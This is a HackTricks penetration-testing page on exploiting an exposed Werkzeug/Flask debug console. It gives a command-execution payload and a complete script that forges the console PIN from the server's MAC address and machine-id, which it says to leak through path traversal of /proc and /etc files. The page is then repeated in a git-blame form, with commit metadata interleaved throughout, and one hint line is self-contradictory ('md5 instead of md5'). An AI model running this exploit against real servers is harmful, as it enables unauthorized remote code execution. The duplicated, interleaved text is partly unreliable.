hacktricks/network-services-pentesting/pentesting-web/werkzeug.md

# Werkzeug / Flask Debug

<details>

<summary><strong>HackTricks in</strong> <a href="https://twitter.com/carlospolopm"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch</strong></a> <strong>Wed - 18.30(UTC) 🎙️</strong> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>

* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).

</details>

## Console RCE

If debug is active you could try to access to `/console` and gain RCE.

```python
__import__('os').popen('whoami').read();
```

![](<../../.gitbook/assets/image (317).png>)

There is also several exploits on the internet like [this ](https://github.com/its-arun/Werkzeug-Debug-RCE)or one in metasploit.

## Pin Protected - Path Traversal

In some occasions the **`/console`** endpoint is going to be protected by a pin. If you have a **file traversal vulnerability**, you can leak all the necessary info to generate that pin.

### Werkzeug Console PIN Exploit

**Copied from the first link.**\
See Werkzeug “console locked” message by forcing debug error page in the app.

```
The console is locked and needs to be unlocked by entering the PIN.
You can find the PIN printed out on the standard output of your
shell that runs the server
```

Locate vulnerable Werkzeug debug console at path `vulnerable-site.com/console`, but is locked by secret PIN number.

You can reverse the algorithm generating the console PIN. Inspect Werkzeug’s debug `__init__.py` file on server e.g. `python3.5/site-packages/werkzeug/debug/__init__.py`. You can view [**Werkzeug source code repo**](https://github.com/pallets/werkzeug/blob/master/src/werkzeug/debug/\_\_init\_\_.py) **to check how the PIN is generated**, but better to leak source code through **file traversal vulnerability** since versions likely differ.

Variables needed to exploit the console PIN:

```python
probably_public_bits = [
    username,
    modname,
    getattr(app, '__name__', getattr(app.__class__, '__name__')),
    getattr(mod, '__file__', None),
]

private_bits = [
    str(uuid.getnode()),
    get_machine_id(),
]
```

#### **`probably_public_bits`**

* **`username`** is the user who started this Flask
* **`modname`** is flask.app
* `getattr(app, '__name__', getattr (app .__ class__, '__name__'))` is **Flask**
* `getattr(mod, '__file__', None)` is the **absolute path of `app.py`** in the flask directory (e.g. `/usr/local/lib/python3.5/dist-packages/flask/app.py`). If `app.py` doesn't work, **try `app.pyc`**

#### `private_bits`

*   `uuid.getnode()` is the **MAC address of the current computer**, `str(uuid.getnode())` is the decimal expression of the mac address.

    *   To **find server MAC address**, need to know which **network interface is being used** to serve the app (e.g. `ens3`). If unknown, **leak `/proc/net/arp`** for device ID and then **leak** MAC address at **`/sys/class/net/<device id>/address`**.


    Convert **from hex address to decimal** representation by running in python e.g.:

    ```python
    # It was 56:00:02:7a:23:ac
    >>> print(0x5600027a23ac)
    94558041547692
    ```
* `get_machine_id()` concatenate the **values in `/etc/machine-id` ** , **`/proc/sys/kernel/random/boot_id`** and **first line of `/proc/self/cgroup`** after the last slash (`/`).

<details>

<summary>get_machine_id() code</summary>

```python
def get_machine_id() -> t.Optional[t.Union[str, bytes]]:                                                                                                  
    global _machine_id

    if _machine_id is not None:
        return _machine_id

    def _generate() -> t.Optional[t.Union[str, bytes]]:
        linux = b""

        # machine-id is stable across boots, boot_id is not.
        for filename in "/etc/machine-id", "/proc/sys/kernel/random/boot_id": 
            try:
                with open(filename, "rb") as f:
                    value = f.readline().strip()
            except OSError:
                continue

            if value:
                linux += value
                break

        # Containers share the same machine id, add some cgroup
        # information. This is used outside containers too but should be
        # relatively stable across boots.
        try:
            with open("/proc/self/cgroup", "rb") as f:
                linux += f.readline().strip().rpartition(b"/")[2]
        except OSError:
            pass

        if linux:
            return linux

        # On OS X, use ioreg to get the computer's serial number.
        try:
```

</details>

Once all variables prepared, run exploit script to generate Werkzeug console PIN:

```python
import hashlib
from itertools import chain
probably_public_bits = [
    'web3_user',# username
    'flask.app',# modname
    'Flask',# getattr(app, '__name__', getattr(app.__class__, '__name__'))
    '/usr/local/lib/python3.5/dist-packages/flask/app.py' # getattr(mod, '__file__', None),
]

private_bits = [
    '279275995014060',# str(uuid.getnode()),  /sys/class/net/ens33/address
    'd4e6cb65d59544f3331ea0425dc555a1'# get_machine_id(), /etc/machine-id
]

#h = hashlib.md5() # Changed in https://werkzeug.palletsprojects.com/en/2.2.x/changes/#version-2-0-0
h = hashlib.sha1()
for bit in chain(probably_public_bits, private_bits):
    if not bit:
        continue
    if isinstance(bit, str):
        bit = bit.encode('utf-8')
    h.update(bit)
h.update(b'cookiesalt')
#h.update(b'shittysalt')

cookie_name = '__wzd' + h.hexdigest()[:20]

num = None
if num is None:
    h.update(b'pinsalt')
    num = ('%09d' % int(h.hexdigest(), 16))[:9]

rv =None
if rv is None:
    for group_size in 5, 4, 3:
        if len(num) % group_size == 0:
            rv = '-'.join(num[x:x + group_size].rjust(group_size, '0')
                          for x in range(0, len(num), group_size))
            break
    else:
        rv = num

print(rv)
```

{% hint style="success" %}
If you are on an **old version** of Werkzeug, try changing the **hashing algorithm to md5** instead of md5.
{% endhint %}

## References

* ****[**https://www.daehee.com/werkzeug-console-pin-exploit/**](https://www.daehee.com/werkzeug-console-pin-exploit/)****
* ****[**https://ctftime.org/writeup/17955**](https://ctftime.org/writeup/17955)****

<details>

<summary><strong>HackTricks in</strong> <a href="https://twitter.com/carlospolopm"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch</strong></a> <strong>Wed - 18.30(UTC) 🎙️</strong> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>

* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).

</details>
-												GITBOOK-3841: change request with no subject merged in GitBook

											
										
										
											2023-03-28 21:30:40 +00:00
+								# Werkzeug / Flask Debug
-												Ad hacktricks sponsoring

											
										
										
											2022-04-28 16:01:33 +00:00
 								<details>
-												GITBOOK-3841: change request with no subject merged in GitBook

											
										
										
											2023-03-28 21:30:40 +00:00
+								<summary><strong>HackTricks in</strong> <a href="https://twitter.com/carlospolopm"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch</strong></a> <strong>Wed - 18.30(UTC) 🎙️</strong> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
-												Ad hacktricks sponsoring

											
										
										
											2022-04-28 16:01:33 +00:00
-												GITBOOK-3841: change request with no subject merged in GitBook

											
										
										
											2023-03-28 21:30:40 +00:00
+								* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
 								* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
 								* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
 								* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
 								* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
-												Ad hacktricks sponsoring

											
										
										
											2022-04-28 16:01:33 +00:00
 								</details>
-												GITBOOK-3841: change request with no subject merged in GitBook

											
										
										
											2023-03-28 21:30:40 +00:00
+								## Console RCE
-												GitBook: [master] one page modified
											
										
										
											2020-11-22 21:47:52 +00:00
-												GitBook: [master] 2 pages and one asset modified
											
										
										
											2020-07-30 18:28:28 +00:00
+								If debug is active you could try to access to `/console` and gain RCE.
 								```python
 								__import__('os').popen('whoami').read();
 								```
-												GitBook: [#2777] gitbookissooooo slow I cannot write

											
										
										
											2021-10-18 11:21:18 +00:00
+								![](<../../.gitbook/assets/image (317).png>)
-												GitBook: [master] 2 pages and one asset modified
											
										
										
											2020-07-30 18:28:28 +00:00
 								There is also several exploits on the internet like [this ](https://github.com/its-arun/Werkzeug-Debug-RCE)or one in metasploit.
-												GITBOOK-3842: change request with no subject merged in GitBook

											
										
										
											2023-03-28 22:07:13 +00:00
+								## Pin Protected - Path Traversal
-												GitBook: [master] one page modified
											
										
										
											2020-11-22 21:47:52 +00:00
-												GITBOOK-3842: change request with no subject merged in GitBook

											
										
										
											2023-03-28 22:07:13 +00:00
+								In some occasions the **`/console`** endpoint is going to be protected by a pin. If you have a **file traversal vulnerability**, you can leak all the necessary info to generate that pin.
-												GitBook: [master] one page modified
											
										
										
											2020-11-22 21:47:52 +00:00
-												GITBOOK-3841: change request with no subject merged in GitBook

											
										
										
											2023-03-28 21:30:40 +00:00
+								### Werkzeug Console PIN Exploit
-												GitBook: [master] one page modified
											
										
										
											2020-11-22 21:47:52 +00:00
-												GitBook: [#2777] gitbookissooooo slow I cannot write

											
										
										
											2021-10-18 11:21:18 +00:00
+								**Copied from the first link.**\
-												GitBook: [master] one page modified
											
										
										
											2020-11-22 21:47:52 +00:00
+								See Werkzeug “console locked” message by forcing debug error page in the app.
-												GitBook: [#2777] gitbookissooooo slow I cannot write

											
										
										
											2021-10-18 11:21:18 +00:00
+								```
-												GitBook: [master] one page modified
											
										
										
											2020-11-22 21:47:52 +00:00
+								The console is locked and needs to be unlocked by entering the PIN.
 								You can find the PIN printed out on the standard output of your
 								shell that runs the server
 								```
-												GitBook: [master] one page modified
											
										
										
											2021-04-20 17:51:23 +00:00
+								Locate vulnerable Werkzeug debug console at path `vulnerable-site.com/console`, but is locked by secret PIN number.
-												GitBook: [master] one page modified
											
										
										
											2020-11-22 21:47:52 +00:00
-												GITBOOK-3842: change request with no subject merged in GitBook

											
										
										
											2023-03-28 22:07:13 +00:00
+								You can reverse the algorithm generating the console PIN. Inspect Werkzeug’s debug `__init__.py` file on server e.g. `python3.5/site-packages/werkzeug/debug/__init__.py`. You can view [**Werkzeug source code repo**](https://github.com/pallets/werkzeug/blob/master/src/werkzeug/debug/\_\_init\_\_.py) **to check how the PIN is generated**, but better to leak source code through **file traversal vulnerability** since versions likely differ.
-												GitBook: [master] one page modified
											
										
										
											2020-11-22 21:47:52 +00:00
 								Variables needed to exploit the console PIN:
-												GitBook: [master] one page modified
											
										
										
											2020-11-22 21:53:42 +00:00
+								```python
-												GitBook: [master] one page modified
											
										
										
											2020-11-22 21:47:52 +00:00
+								probably_public_bits = [
 								    username,
 								    modname,
 								    getattr(app, '__name__', getattr(app.__class__, '__name__')),
 								    getattr(mod, '__file__', None),
 								]
 								private_bits = [
 								    str(uuid.getnode()),
 								    get_machine_id(),
 								]
 								```
-												GITBOOK-3841: change request with no subject merged in GitBook

											
										
										
											2023-03-28 21:30:40 +00:00
+								#### **`probably_public_bits`**
 								* **`username`** is the user who started this Flask
 								* **`modname`** is flask.app
 								* `getattr(app, '__name__', getattr (app .__ class__, '__name__'))` is **Flask**
 								* `getattr(mod, '__file__', None)` is the **absolute path of `app.py`** in the flask directory (e.g. `/usr/local/lib/python3.5/dist-packages/flask/app.py`). If `app.py` doesn't work, **try `app.pyc`**
 								#### `private_bits`
-												GitBook: [master] one page modified
											
										
										
											2020-11-22 21:47:52 +00:00
-												GITBOOK-3841: change request with no subject merged in GitBook

											
										
										
											2023-03-28 21:30:40 +00:00
+								*   `uuid.getnode()` is the **MAC address of the current computer**, `str(uuid.getnode())` is the decimal expression of the mac address.
-												GitBook: [master] one page modified
											
										
										
											2020-11-22 21:47:52 +00:00
-												GITBOOK-3841: change request with no subject merged in GitBook

											
										
										
											2023-03-28 21:30:40 +00:00
+								    *   To **find server MAC address**, need to know which **network interface is being used** to serve the app (e.g. `ens3`). If unknown, **leak `/proc/net/arp`** for device ID and then **leak** MAC address at **`/sys/class/net/<device id>/address`**.
 								    Convert **from hex address to decimal** representation by running in python e.g.:
 								    ```python
 								    # It was 56:00:02:7a:23:ac
 								    >>> print(0x5600027a23ac)
 								    94558041547692
 								    ```
 								* `get_machine_id()` concatenate the **values in `/etc/machine-id` ** , **`/proc/sys/kernel/random/boot_id`** and **first line of `/proc/self/cgroup`** after the last slash (`/`).
 								<details>
 								<summary>get_machine_id() code</summary>
-												GitBook: [master] one page modified
											
										
										
											2020-11-22 21:47:52 +00:00
-												GitBook: [master] one page modified
											
										
										
											2020-11-22 21:53:42 +00:00
+								```python
-												GITBOOK-3841: change request with no subject merged in GitBook

											
										
										
											2023-03-28 21:30:40 +00:00
+								def get_machine_id() -> t.Optional[t.Union[str, bytes]]:
 								    global _machine_id
 								    if _machine_id is not None:
 								        return _machine_id
 								    def _generate() -> t.Optional[t.Union[str, bytes]]:
 								        linux = b""
 								        # machine-id is stable across boots, boot_id is not.
 								        for filename in "/etc/machine-id", "/proc/sys/kernel/random/boot_id":
 								            try:
 								                with open(filename, "rb") as f:
 								                    value = f.readline().strip()
 								            except OSError:
 								                continue
 								            if value:
 								                linux += value
 								                break
 								        # Containers share the same machine id, add some cgroup
 								        # information. This is used outside containers too but should be
 								        # relatively stable across boots.
 								        try:
 								            with open("/proc/self/cgroup", "rb") as f:
 								                linux += f.readline().strip().rpartition(b"/")[2]
 								        except OSError:
 								            pass
 								        if linux:
 								            return linux
 								        # On OS X, use ioreg to get the computer's serial number.
 								        try:
-												GitBook: [master] one page modified
											
										
										
											2020-11-22 21:47:52 +00:00
+								```
-												GITBOOK-3841: change request with no subject merged in GitBook

											
										
										
											2023-03-28 21:30:40 +00:00
+								</details>
-												GitBook: [master] one page modified
											
										
										
											2020-11-22 21:47:52 +00:00
+								Once all variables prepared, run exploit script to generate Werkzeug console PIN:
-												GitBook: [master] one page modified
											
										
										
											2020-11-22 21:53:42 +00:00
+								```python
-												GitBook: [master] one page modified
											
										
										
											2020-11-22 21:47:52 +00:00
+								import hashlib
 								from itertools import chain
 								probably_public_bits = [
-												GitBook: [master] 2 pages modified
											
										
										
											2021-03-18 22:41:37 +00:00
+								    'web3_user',# username
 								    'flask.app',# modname
 								    'Flask',# getattr(app, '__name__', getattr(app.__class__, '__name__'))
 								    '/usr/local/lib/python3.5/dist-packages/flask/app.py' # getattr(mod, '__file__', None),
-												GitBook: [master] one page modified
											
										
										
											2020-11-22 21:47:52 +00:00
+								]
 								private_bits = [
-												GitBook: [master] 2 pages modified
											
										
										
											2021-03-18 22:41:37 +00:00
+								    '279275995014060',# str(uuid.getnode()),  /sys/class/net/ens33/address
 								    'd4e6cb65d59544f3331ea0425dc555a1'# get_machine_id(), /etc/machine-id
-												GitBook: [master] one page modified
											
										
										
											2020-11-22 21:47:52 +00:00
+								]
-												GITBOOK-3841: change request with no subject merged in GitBook

											
										
										
											2023-03-28 21:30:40 +00:00
+								#h = hashlib.md5() # Changed in https://werkzeug.palletsprojects.com/en/2.2.x/changes/#version-2-0-0
 								h = hashlib.sha1()
-												GitBook: [master] one page modified
											
										
										
											2020-11-22 21:47:52 +00:00
+								for bit in chain(probably_public_bits, private_bits):
-												GitBook: [master] 2 pages modified
											
										
										
											2021-03-18 22:41:37 +00:00
+								    if not bit:
 								        continue
 								    if isinstance(bit, str):
 								        bit = bit.encode('utf-8')
 								    h.update(bit)
-												GitBook: [master] one page modified
											
										
										
											2020-11-22 21:47:52 +00:00
+								h.update(b'cookiesalt')
 								#h.update(b'shittysalt')
 								cookie_name = '__wzd' + h.hexdigest()[:20]
 								num = None
 								if num is None:
-												GitBook: [master] 2 pages modified
											
										
										
											2021-03-18 22:41:37 +00:00
+								    h.update(b'pinsalt')
 								    num = ('%09d' % int(h.hexdigest(), 16))[:9]
-												GitBook: [master] one page modified
											
										
										
											2020-11-22 21:47:52 +00:00
 								rv =None
 								if rv is None:
-												GitBook: [master] 2 pages modified
											
										
										
											2021-03-18 22:41:37 +00:00
+								    for group_size in 5, 4, 3:
 								        if len(num) % group_size == 0:
 								            rv = '-'.join(num[x:x + group_size].rjust(group_size, '0')
 								                          for x in range(0, len(num), group_size))
 								            break
 								    else:
 								        rv = num
-												GitBook: [master] one page modified
											
										
										
											2020-11-22 21:47:52 +00:00
 								print(rv)
 								```
-												Ad hacktricks sponsoring

											
										
										
											2022-04-28 16:01:33 +00:00
-												GITBOOK-3841: change request with no subject merged in GitBook

											
										
										
											2023-03-28 21:30:40 +00:00
+								{% hint style="success" %}
 								If you are on an **old version** of Werkzeug, try changing the **hashing algorithm to md5** instead of md5.
 								{% endhint %}
-												Ad hacktricks sponsoring

											
										
										
											2022-04-28 16:01:33 +00:00
-												GITBOOK-3842: change request with no subject merged in GitBook

											
										
										
											2023-03-28 22:07:13 +00:00
+								## References
 								* ****[**https://www.daehee.com/werkzeug-console-pin-exploit/**](https://www.daehee.com/werkzeug-console-pin-exploit/)****
 								* ****[**https://ctftime.org/writeup/17955**](https://ctftime.org/writeup/17955)****
-												Ad hacktricks sponsoring

											
										
										
											2022-04-28 16:01:33 +00:00
+								<details>
-												GITBOOK-3841: change request with no subject merged in GitBook

											
										
										
											2023-03-28 21:30:40 +00:00
+								<summary><strong>HackTricks in</strong> <a href="https://twitter.com/carlospolopm"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch</strong></a> <strong>Wed - 18.30(UTC) 🎙️</strong> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
-												Ad hacktricks sponsoring

											
										
										
											2022-04-28 16:01:33 +00:00
-												GITBOOK-3841: change request with no subject merged in GitBook

											
										
										
											2023-03-28 21:30:40 +00:00
+								* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
 								* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
 								* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
 								* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
 								* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
-												Ad hacktricks sponsoring

											
										
										
											2022-04-28 16:01:33 +00:00
 								</details>